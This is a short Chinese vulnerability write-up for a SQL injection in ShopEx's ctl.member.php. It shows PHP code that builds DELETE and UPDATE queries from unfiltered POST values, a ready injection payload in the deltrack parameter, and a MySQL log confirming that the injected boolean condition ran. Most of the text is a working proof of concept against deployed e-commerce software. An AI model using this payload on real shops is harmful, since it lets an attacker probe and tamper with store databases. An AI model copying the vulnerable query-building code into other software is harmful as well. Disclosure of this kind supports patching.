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shopex ctl.member.php文件SQL注入漏洞

    相关阅读: SQL
 又是sql注入漏洞 测试版本:shopex-singel-


function delTrackMsg() { if(!empty($_POST['deltrack'])){ $oMsg = &$this->system->loadModel('resources/msgbox'); $oMsg->delTrackMsg($_POST['deltrack']); $this->splash('success', $this->system->mkUrl("member","track"), __('删除成功')); }else{ $this->splash('failed', $this->system->mkUrl("member","track"), __('删除失败: 没有选中任何记录!')); } }
public function delTrackMsg( $aMsgId ) { foreach ( $aMsgId as $val ) { if ( $val ) { $aTmp[] = $val; } } if ( $aTmp ) { $this->db->exec( "DELETE FROM sdb_message WHERE msg_id IN (".implode( ",", $aTmp ).") AND del_status='1'" ); $this->db->exec( "UPDATE sdb_message SET del_status='2' WHERE msg_id IN (".implode( ",", $aTmp ).")" ); } return true; }
提交数据包;deltrack[1]=1) and (select count(*) from sdb_operators)=1%23
130526 20:31:25 360 Connect root@localhost on 360 Init DB shopex 360 Query SET NAMES 'utf8' 360 Query SELECT * FROM sdb_plugins WHERE plugin_type="app" 360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1 360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1 360 Query select member_id,member_lv_id,email,uname,b_year,b_month,b_day,password,unreadmsg,cur,lang,point,experience from sdb_members where member_id=4 LIMIT 0, 1 360 Query SELECT count(*) AS unreadmsg FROM sdb_message WHERE to_type = 0 AND del_status != '1' AND folder = 'inbox' AND unread = '0' AND to_id =4 LIMIT 0, 1 360 Query SELECT plugin_name,plugin_ident FROM sdb_plugins WHERE 1 AND sdb_plugins.disabled = 'false' AND sdb_plugins.plugin_type='app' LIMIT 0, 20 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='commodity_radar' LIMIT 0, 1 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='shopex_stat' LIMIT 0, 1 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='pay_offline' LIMIT 0, 1 360 Query DELETE FROM sdb_message WHERE msg_id IN (1) and (select count(*) from sdb_operators)=1#) AND del_status='1'
因为(select count(*) from sdb_operators)=1,所以msg_id=1的记录被删除。
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